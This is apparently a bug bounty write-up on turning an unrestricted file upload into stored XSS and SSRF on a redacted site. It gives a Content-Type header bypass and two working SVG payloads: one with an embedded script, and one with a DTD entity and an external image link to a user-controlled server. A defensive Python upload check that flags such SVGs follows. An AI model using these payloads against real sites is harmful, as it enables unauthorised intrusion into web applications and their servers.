I was hunting on a website; it is a private site, so let's call it redacted.com. After some hours of hunting I got some low vulnerability bugs. In one of them I got unrestricted file upload by changing the Content-Type header, and then I thought of making it a more critical vulnerability….!
Description:
I have crafted a malicious SVG file. Since the application has an unrestricted file upload bug and does not filter the content, the code below can be saved as a file with the .svg extension, and I have used the payload below to trigger:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('Vulnerable to XSS attacks');
</script>
</svg>
The vulnerability can be exploited by uploading this image in the image upload section. Using the unrestricted file upload bug I can upload SVG files and any malicious files there. I used an SVG with the above code in it, and if you then preview the image you can see the XSS is triggered..!!!!
I was also able to get from SVG to SSRF: after using the code below I got an HTTP response in Burp Collaborator :)
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE testingxxe [ <!ENTITY xml "eXtensible Markup Language"> ]>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
<image height="30" width="30" xlink:href="http://<usercontrolledserver>/" />
<text x="0" y="20" font-size="20">&xml;</text>
</svg>
Conclusion:
This is how we can perform stored XSS and SSRF attacks using SVG files.
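A server-side check an upload handler could run to refuse both payload shapes shown above. This is an added example, not code from the original post or from the target application; the function name, finding labels, element list and sample inputs are constructed for illustration.

```python
import xml.parsers.expat as expat

# Elements that run or embed active content when a browser renders the SVG.
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}

class _Abort(Exception):
    """Raised inside a handler to stop parsing at the first DTD."""

def svg_findings(data: bytes) -> list:
    """Return reasons to reject an uploaded SVG; an empty list means none found."""
    findings = []

    def on_doctype(*_):
        # A DTD can declare entities; refuse it before any are processed.
        findings.append("doctype")
        raise _Abort()

    def on_start(tag, attrs):
        local = tag.split(":")[-1]               # drop any namespace prefix
        if local in ACTIVE_ELEMENTS:
            findings.append(f"active-element:{local}")
        for name, value in attrs.items():
            attr = name.split(":")[-1].lower()
            if attr.startswith("on"):            # onload, onclick, ...
                findings.append(f"event-handler:{name}")
            elif attr in ("href", "src") and not value.strip().startswith("#"):
                # Only same-document fragments (#id) pass; anything else can
                # make the renderer fetch a URL or follow a javascript: link.
                findings.append(f"external-reference:{local}")

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    try:
        parser.Parse(data, True)
    except _Abort:
        pass
    except expat.ExpatError:
        findings.append("malformed-xml")
    return findings

# Constructed samples (collector.invalid is a placeholder host).
SVG_NS = b'xmlns="http://www.w3.org/2000/svg"'
SCRIPT_SVG = b"<svg " + SVG_NS + b"><script>alert(1)</script></svg>"
DTD_SVG = b'<!DOCTYPE t [<!ENTITY xml "x">]><svg ' + SVG_NS + b"><text>&xml;</text></svg>"
REMOTE_SVG = (b"<svg " + SVG_NS + b' xmlns:xlink="http://www.w3.org/1999/xlink">'
              b'<image xlink:href="http://collector.invalid/"/></svg>')
PLAIN_SVG = b"<svg " + SVG_NS + b'><polygon points="0,0 0,50 50,0"/></svg>'
```

Run the check on the file's bytes rather than trusting the Content-Type header or the extension, since the post shows the header is attacker-controlled.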
I will see you in the next post.
Thanks for reading!!
Follow me on twitter: https://twitter.com/nave1n0x